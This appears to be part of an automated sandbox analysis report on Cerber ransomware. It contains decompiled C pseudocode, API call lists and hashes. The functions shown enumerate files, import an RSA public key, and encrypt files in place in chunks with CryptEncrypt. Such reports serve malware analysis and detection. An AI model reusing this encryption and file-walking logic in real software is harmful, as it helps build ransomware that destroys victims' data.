                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A4FB
                                                                                                                                                                                        • lstrcatW.KERNEL32(?,0040CEC8), ref: 0040A50D
                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,0040A367,00000000), ref: 0040A518
                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040A527
                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0040A586
                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000), ref: 0040A5A2
                                                                                                                                                                                        • lstrlenW.KERNEL32(?,0040A367), ref: 0040A5DB
                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0040A602
                                                                                                                                                                                        • CharLowerBuffW.USER32(?,00000000), ref: 0040A610
                                                                                                                                                                                        • Sleep.KERNEL32(00000001), ref: 0040A621
                                                                                                                                                                                        • StrChrW.SHLWAPI(?,0000002E), ref: 0040A669
                                                                                                                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 0040A690
                                                                                                                                                                                        • FindClose.KERNEL32(?), ref: 0040A6A1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$Attributes$Find$ErrorLastSecuritylstrlen$BuffCharCloseDescriptorEqualFirstFreeHeapLowerNextObjectOwnerSingleSleepWaitlstrcatwsprintf
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3254900428-0
                                                                                                                                                                                        • Opcode ID: 0dc60112ac7b66a14e6d56861434c25d3f81de6f7ddc304724af9a2b16f46d05
                                                                                                                                                                                        • Instruction ID: 6187f46a005a6f47ffa6dfcf539702b581d4e88321e0c337fcbf86212e5dcf34
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0dc60112ac7b66a14e6d56861434c25d3f81de6f7ddc304724af9a2b16f46d05
                                                                                                                                                                                        • Instruction Fuzzy Hash: F9618275900219ABDB209BA0DD49FDB777CBF04310F0445BAF909F2190EB3A9A65CF5A
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                        			E00409857(void* __ecx, void* __eflags) {
                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                        				struct _SHFILEINFOW _v708;
                                                                                                                                                                                        				short _v1222;
                                                                                                                                                                                        				short _v1228;
                                                                                                                                                                                        				char _v1748;
                                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v2340;
                                                                                                                                                                                        				char _v2860;
                                                                                                                                                                                        				short _v3380;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                        				void* _t69;
                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t79 = __eflags;
                                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                                        				 *0x40eb10(0);
                                                                                                                                                                                        				GetSystemDirectoryW( &_v1228, 0x104);
                                                                                                                                                                                        				_t74 = 0x2b4;
                                                                                                                                                                                        				SHGetFileInfoW( &_v1228, 0,  &_v708, 0x2b4, 0x400);
                                                                                                                                                                                        				_t34 = E0040AF39(_t67, lstrlenW( &(_v708.szTypeName)) + _t32);
                                                                                                                                                                                        				_pop(_t68);
                                                                                                                                                                                        				_v8 = _t34;
                                                                                                                                                                                        				_v1222 = 0;
                                                                                                                                                                                        				SHGetFileInfoW( &_v1228, 0,  &_v708, 0x2b4, 0x400);
                                                                                                                                                                                        				_t42 = E0040AF39(_t68, lstrlenW( &(_v708.szTypeName)) + _t40);
                                                                                                                                                                                        				_pop(_t69);
                                                                                                                                                                                        				_v12 = _t42;
                                                                                                                                                                                        				 *0x40e798(0, 8, 0, 0,  &_v1748);
                                                                                                                                                                                        				_push( &_v1748);
                                                                                                                                                                                        				_push(E0040591C(0x40d7f4, 8, 0x9d46391f));
                                                                                                                                                                                        				_push( &_v3380);
                                                                                                                                                                                        				E00405A8E(0, 0x400, 0x2b4, _t79);
                                                                                                                                                                                        				_t77 = _t75 + 0x18;
                                                                                                                                                                                        				_t51 = FindFirstFileW( &_v3380,  &_v2340);
                                                                                                                                                                                        				_t73 = _t51;
                                                                                                                                                                                        				_t80 = _t73 - 0xffffffff;
                                                                                                                                                                                        				if(_t73 != 0xffffffff) {
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_push( &(_v2340.cFileName));
                                                                                                                                                                                        						_push( &_v1748);
                                                                                                                                                                                        						_push(E0040591C(0x40ced4, 5, 0x7f642c43));
                                                                                                                                                                                        						_push( &_v2860);
                                                                                                                                                                                        						E00405A8E(0, _t73, _t74, _t80);
                                                                                                                                                                                        						_push(_v12);
                                                                                                                                                                                        						_push(_v8);
                                                                                                                                                                                        						_push( &_v2860);
                                                                                                                                                                                        						_t74 = E0040972C(0, _t73, _t74, _t80);
                                                                                                                                                                                        						_t77 = _t77 + 0x28;
                                                                                                                                                                                        						_t81 = _t74;
                                                                                                                                                                                        						if(_t74 != 0) {
                                                                                                                                                                                        							CharLowerBuffW(_t74, lstrlenW(_t74));
                                                                                                                                                                                        							E004096CC(_t69, _t81, _t74);
                                                                                                                                                                                        							_pop(_t69);
                                                                                                                                                                                        							E00405463(_t74);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					} while (FindNextFileW(_t73,  &_v2340) != 0);
                                                                                                                                                                                        					return FindClose(_t73);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t51;
                                                                                                                                                                                        			}



























                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00409866
                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00409878
                                                                                                                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000400), ref: 00409899
                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004098A6
                                                                                                                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000400), ref: 004098D8
                                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 004098E5
                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000008,00000000,00000000,?), ref: 00409909
                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00409948
                                                                                                                                                                                          • Part of subcall function 0040972C: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000408), ref: 004097E1
                                                                                                                                                                                          • Part of subcall function 0040972C: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 004097EE
                                                                                                                                                                                          • Part of subcall function 0040972C: PathFindExtensionW.SHLWAPI(?,?,?,?,?,?,?,?,?,?), ref: 00409814
                                                                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004099A0
                                                                                                                                                                                        • CharLowerBuffW.USER32(00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004099A8
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: HeapFree.KERNEL32(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004099C2
                                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 004099CD
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$Findlstrlen$Info$ErrorLastPath$BuffCharCloseDirectoryExtensionFirstFolderFreeHeapInitializeLowerNextSystem
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2493930338-0
                                                                                                                                                                                        • Opcode ID: 0822e2e8c096c2ee9e11d9b7235df1899e2bee36cc35450901059efa43ad0b20
                                                                                                                                                                                        • Instruction ID: 98bb2fb97e339870cc37db1ad270d3e311652f1936ccaf0b3fdcbc75b29e6f69
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0822e2e8c096c2ee9e11d9b7235df1899e2bee36cc35450901059efa43ad0b20
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D4121B2901118ABDB10ABA0DD89EEF777CEB45314F0405B7B605F2051E6349F488F69
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                        			E0040B283(void* __ecx, void* __eflags, intOrPtr _a4, void* _a8, char _a12) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				signed int _t64;
                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                        				intOrPtr _t71;
                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                        				char _t75;
                                                                                                                                                                                        				intOrPtr* _t79;
                                                                                                                                                                                        				intOrPtr* _t86;
                                                                                                                                                                                        				int _t87;
                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                        				void* _t93;
                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                        				char _t98;
                                                                                                                                                                                        				char _t99;
                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                        				intOrPtr _t104;
                                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                                        				void* _t108;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t1 =  &_a12; // 0x402a28
                                                                                                                                                                                        				_t105 = E0040B146(__ecx, _a4);
                                                                                                                                                                                        				_t64 =  *( *_t1);
                                                                                                                                                                                        				_t3 = _t105 - 0xb; // -11
                                                                                                                                                                                        				_t87 = _t3;
                                                                                                                                                                                        				_t97 = _t64 % _t87;
                                                                                                                                                                                        				_t92 = 0 | _t97 != 0x00000000;
                                                                                                                                                                                        				_v36 = _t97;
                                                                                                                                                                                        				_t101 = _t64 / _t87 + (_t97 != 0);
                                                                                                                                                                                        				_v28 = _t101;
                                                                                                                                                                                        				_v40 = _t101 * _t105;
                                                                                                                                                                                        				_t66 = E004053BD(_t97 != 0);
                                                                                                                                                                                        				_v20 = _t66;
                                                                                                                                                                                        				if(_t66 != 0) {
                                                                                                                                                                                        					_t68 = E004053BD(_t92);
                                                                                                                                                                                        					_v12 = _t68;
                                                                                                                                                                                        					if(_t68 != 0) {
                                                                                                                                                                                        						_v24 = _v24 & 0x00000000;
                                                                                                                                                                                        						_t19 =  &_v20; // 0x402a28
                                                                                                                                                                                        						_t104 =  *_t19;
                                                                                                                                                                                        						_v16 = _a8;
                                                                                                                                                                                        						_t71 = _v28 - 1;
                                                                                                                                                                                        						_v5 = 1;
                                                                                                                                                                                        						_v32 = _t71;
                                                                                                                                                                                        						if(_t71 == 0) {
                                                                                                                                                                                        							L8:
                                                                                                                                                                                        							_t72 = _v36;
                                                                                                                                                                                        							_v24 = _t72;
                                                                                                                                                                                        							if(_t72 == 0) {
                                                                                                                                                                                        								_v24 = _t87;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							memcpy(_v12, _v16, _v24);
                                                                                                                                                                                        							_t88 = _v12;
                                                                                                                                                                                        							_t75 =  *0x40fa50(_a4, 0, 1, 0, _t88,  &_v24, _t105);
                                                                                                                                                                                        							if(_t75 == 0) {
                                                                                                                                                                                        								_v5 = _t75;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t93 = 0;
                                                                                                                                                                                        							if(_t105 != 0) {
                                                                                                                                                                                        								_t52 = _t88 - 1; // -1
                                                                                                                                                                                        								_t79 = _t105 + _t52;
                                                                                                                                                                                        								do {
                                                                                                                                                                                        									_t98 =  *_t79;
                                                                                                                                                                                        									_t79 = _t79 - 1;
                                                                                                                                                                                        									 *((char*)(_t93 + _t104)) = _t98;
                                                                                                                                                                                        									_t93 = _t93 + 1;
                                                                                                                                                                                        								} while (_t93 < _t105);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							if(_v5 != 0) {
                                                                                                                                                                                        								_t60 =  &_a12; // 0x402a28
                                                                                                                                                                                        								 *( *_t60) = _v40;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                        								_v28 = _t87;
                                                                                                                                                                                        								memcpy(_v12, _v16, _t87);
                                                                                                                                                                                        								_t108 = _t108 + 0xc;
                                                                                                                                                                                        								 *0x40fa50(_a4, 0, 0, 0, _v12,  &_v28, _t105);
                                                                                                                                                                                        								if(0 == 0) {
                                                                                                                                                                                        									break;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t95 = 0;
                                                                                                                                                                                        								if(_t105 != 0) {
                                                                                                                                                                                        									_t32 = _v12 - 1; // -1
                                                                                                                                                                                        									_t86 = _t105 + _t32;
                                                                                                                                                                                        									do {
                                                                                                                                                                                        										_t99 =  *_t86;
                                                                                                                                                                                        										_t86 = _t86 - 1;
                                                                                                                                                                                        										 *((char*)(_t95 + _t104)) = _t99;
                                                                                                                                                                                        										_t95 = _t95 + 1;
                                                                                                                                                                                        									} while (_t95 < _t105);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t104 = _t104 + _v28;
                                                                                                                                                                                        								_v16 = _v16 + _t87;
                                                                                                                                                                                        								_v24 = _v24 + 1;
                                                                                                                                                                                        								if(_v24 < _v32) {
                                                                                                                                                                                        									continue;
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									goto L8;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							L16:
                                                                                                                                                                                        							_t55 =  &_v20; // 0x402a28
                                                                                                                                                                                        							E00405463( *_t55);
                                                                                                                                                                                        							E00405463(_v12);
                                                                                                                                                                                        							_v20 = _v20 & 0x00000000;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				L18:
                                                                                                                                                                                        				_t61 =  &_v20; // 0x402a28
                                                                                                                                                                                        				return  *_t61;
                                                                                                                                                                                        			}
































                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040b34e
                                                                                                                                                                                        0x0040b3a8
                                                                                                                                                                                        0x0040b3a8
                                                                                                                                                                                        0x0040b3ab
                                                                                                                                                                                        0x0040b3b3
                                                                                                                                                                                        0x0040b3b8
                                                                                                                                                                                        0x0040b3b8
                                                                                                                                                                                        0x0040b2f5
                                                                                                                                                                                        0x0040b2d7
                                                                                                                                                                                        0x0040b3c6
                                                                                                                                                                                        0x0040b3c6
                                                                                                                                                                                        0x0040b3cd

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040B146: CryptGetKeyParam.ADVAPI32(?,00000009,004029D6,?,00000000,0040D17C,004029D6,004029D6,?,0040273B,00000000,80C426C8,?,00000000), ref: 0040B166
                                                                                                                                                                                        • memcpy.NTDLL(00000000,00000000,-0000000B,80C426C8,00000000,?), ref: 0040B301
                                                                                                                                                                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,80C426C8,00000000,?), ref: 0040B319
                                                                                                                                                                                        • memcpy.NTDLL(00000000,00000000,00000000,80C426C8,00000000,?), ref: 0040B366
                                                                                                                                                                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,80C426C8,00000000,?), ref: 0040B380
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$Encryptmemcpy$Param
                                                                                                                                                                                        • String ID: (*@$(*@
                                                                                                                                                                                        • API String ID: 673012589-2671997973
                                                                                                                                                                                        • Opcode ID: 7a4236b57eb6ddee40509aff3a651f68f0ba7db94422606a0f75ca3171f2a96d
                                                                                                                                                                                        • Instruction ID: 54093158f1a825de50d9d814c6b244fb5fab6a3abbe75fd9e2e92e6b8b7ee4fc
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a4236b57eb6ddee40509aff3a651f68f0ba7db94422606a0f75ca3171f2a96d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D415771D0020AAFDF11DFA5C881AEFBBB9EF44704F24407AE801B7291D7359E458BA8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 56%
                                                                                                                                                                                        			E0040194B(void* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20, union _LARGE_INTEGER _a24, union _LARGE_INTEGER* _a28) {
                                                                                                                                                                                        				struct _OVERLAPPED* _v5;
                                                                                                                                                                                        				signed char _v12;
                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                        				long* _v24;
                                                                                                                                                                                        				long _v28;
                                                                                                                                                                                        				long _v32;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				long* _t44;
                                                                                                                                                                                        				struct _OVERLAPPED* _t62;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        				intOrPtr _t68;
                                                                                                                                                                                        				intOrPtr _t70;
                                                                                                                                                                                        				long _t71;
                                                                                                                                                                                        				void* _t72;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t62 = 0;
                                                                                                                                                                                        				_t44 = E0040AF8D( *0x42f7a4 & 0x0000ffff, _a8);
                                                                                                                                                                                        				_pop(_t63);
                                                                                                                                                                                        				_v24 = _t44;
                                                                                                                                                                                        				if(_t44 == 0) {
                                                                                                                                                                                        					L9:
                                                                                                                                                                                        					return _t62;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t68 = _a12;
                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_v5 = 1;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				while(_t68 != _t62) {
                                                                                                                                                                                        					_t70 =  *0x42f7d8; // 0x0
                                                                                                                                                                                        					_v12 = _v12 + 1;
                                                                                                                                                                                        					_push(_t62);
                                                                                                                                                                                        					_t71 =  <  ? _t68 : _t70;
                                                                                                                                                                                        					_t68 = _t68 - _t71;
                                                                                                                                                                                        					SetFilePointerEx(_a4, _a24.LowPart, _a28, _t62);
                                                                                                                                                                                        					ReadFile(_a4, _a16, _t71,  &_v32, _t62);
                                                                                                                                                                                        					E0040ADF6(_t63, _a16,  &_v20,  &_v16, _t71);
                                                                                                                                                                                        					_t72 = _t72 + 0xc;
                                                                                                                                                                                        					_push(_t71);
                                                                                                                                                                                        					_push( &_v28);
                                                                                                                                                                                        					_push(_a16);
                                                                                                                                                                                        					_push(_t62);
                                                                                                                                                                                        					_v28 = _t71;
                                                                                                                                                                                        					_push(0 | _t68 == _t62);
                                                                                                                                                                                        					_push(_t62);
                                                                                                                                                                                        					_push(_v24);
                                                                                                                                                                                        					if( *0x40fa50() == 0) {
                                                                                                                                                                                        						_v5 = _t62;
                                                                                                                                                                                        						L8:
                                                                                                                                                                                        						 *((intOrPtr*)(_a20 + 4)) = E0040AEED(_v16, _v20, _a12);
                                                                                                                                                                                        						CryptDestroyKey(_v24);
                                                                                                                                                                                        						_t62 = _v5;
                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_push(_t62);
                                                                                                                                                                                        					SetFilePointerEx(_a4, _a24.LowPart, _a28, _t62);
                                                                                                                                                                                        					WriteFile(_a4, _a16, _t71,  &_v32, _t62);
                                                                                                                                                                                        					_a24.LowPart = _a24 + _t71;
                                                                                                                                                                                        					asm("adc [ebp+0x20], ebx");
                                                                                                                                                                                        					if((_v12 & 0x00000001) == 0) {
                                                                                                                                                                                        						Sleep(1);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                        			}


















                                                                                                                                                                                        0x00401a1c
                                                                                                                                                                                        0x00401a20
                                                                                                                                                                                        0x00401a20
                                                                                                                                                                                        0x00401a1c
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040AF8D: memcpy.NTDLL(?,?,00000010,0001A2AC), ref: 0040AFC6
                                                                                                                                                                                          • Part of subcall function 0040AF8D: CryptImportKey.ADVAPI32(00000208,0000001C,00000000,00000000,00000000,?,?,0001A2AC), ref: 0040AFE2
                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 004019A1
                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004019B3
                                                                                                                                                                                        • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000), ref: 004019E5
                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 004019FA
                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00401A0C
                                                                                                                                                                                        • Sleep.KERNEL32(00000001), ref: 00401A20
                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(?), ref: 00401A4B
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$Crypt$Pointer$DestroyEncryptImportReadSleepWritememcpy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1821214037-0
                                                                                                                                                                                        • Opcode ID: 584aa682ed8e0e52711135a3264aa759251664396659cda2042a4cbfd36ba68c
                                                                                                                                                                                        • Instruction ID: 18c608ade0755fad8d0103536e9642e00f749d4286a3dbf0ab3fd0c468255ba2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 584aa682ed8e0e52711135a3264aa759251664396659cda2042a4cbfd36ba68c
                                                                                                                                                                                        • Instruction Fuzzy Hash: B63134B290121AAFCF119FA4DD849EF7F79EF48304F00407AF905A2161D7368A69DFA5
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 42%
                                                                                                                                                                                        			E0040B17E(char _a4) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_t14 = E0040B11B();
                                                                                                                                                                                        				_t44 = _t14;
                                                                                                                                                                                        				if(_t14 != 0) {
                                                                                                                                                                                        					_t16 = E00405905(0x40d944, 0x11, 0xd0371e50);
                                                                                                                                                                                        					_t2 =  &_a4; // 0x4029e6
                                                                                                                                                                                        					_t36 = E00401127(0, E004032B8(E004031AF( *_t2, _t44, _t16), _t44));
                                                                                                                                                                                        					if(_t21 != 0) {
                                                                                                                                                                                        						_t3 =  &_v12; // 0x4029e6
                                                                                                                                                                                        						_v12 = 0;
                                                                                                                                                                                        						_t39 = E00401127(_t3, _t36);
                                                                                                                                                                                        						if(_t39 != 0) {
                                                                                                                                                                                        							_push( &_v20);
                                                                                                                                                                                        							_push( &_v8);
                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                        							_push(0x8000);
                                                                                                                                                                                        							_t7 =  &_v12; // 0x4029e6
                                                                                                                                                                                        							_push( *_t7);
                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                        							_push(_t39);
                                                                                                                                                                                        							_push(8);
                                                                                                                                                                                        							_push(0x10001);
                                                                                                                                                                                        							_v20 = 0;
                                                                                                                                                                                        							if( *0x40f918() != 0) {
                                                                                                                                                                                        								 *0x40f804( *0x42faf8, 1, _v8,  &_v16);
                                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							E00405463(_t39);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						E00405463(_t36);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v16;
                                                                                                                                                                                        			}













                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040B11B: CryptAcquireContextW.ADVAPI32(0042FAF8,00000000,00000000,00000001,F0000000,0040B260,004029D6,?,00402726,00000000,004029D6,80C426C8,?,00000000), ref: 0040B134
                                                                                                                                                                                        • CryptDecodeObjectEx.CRYPT32(00010001,00000008,00000000,)@,00008000,00000000,?,?), ref: 0040B1FD
                                                                                                                                                                                        • CryptImportPublicKeyInfo.CRYPT32(00000001,?,?), ref: 0040B216
                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,80C426C8,?,?,?,004029E6,?,00000000,00000000), ref: 0040B21F
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$AcquireContextDecodeFreeImportInfoLocalObjectPublic
                                                                                                                                                                                        • String ID: )@$)@
                                                                                                                                                                                        • API String ID: 1445165286-924509997
                                                                                                                                                                                        • Opcode ID: b560cf34fa18f15d1589192bbe6a7893b1c4e6bb17b16e0439bc3e1605ae3479
                                                                                                                                                                                        • Instruction ID: ff3408afee1e7cb94f08fa9440ee7e9cb1970d792c828288a7f0ea7b6b935642
                                                                                                                                                                                        • Opcode Fuzzy Hash: b560cf34fa18f15d1589192bbe6a7893b1c4e6bb17b16e0439bc3e1605ae3479
                                                                                                                                                                                        • Instruction Fuzzy Hash: F0119372900208BBCB10EFA5DC85FDF7B78EB44754F0444BAF500B7191D7799A448B98
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

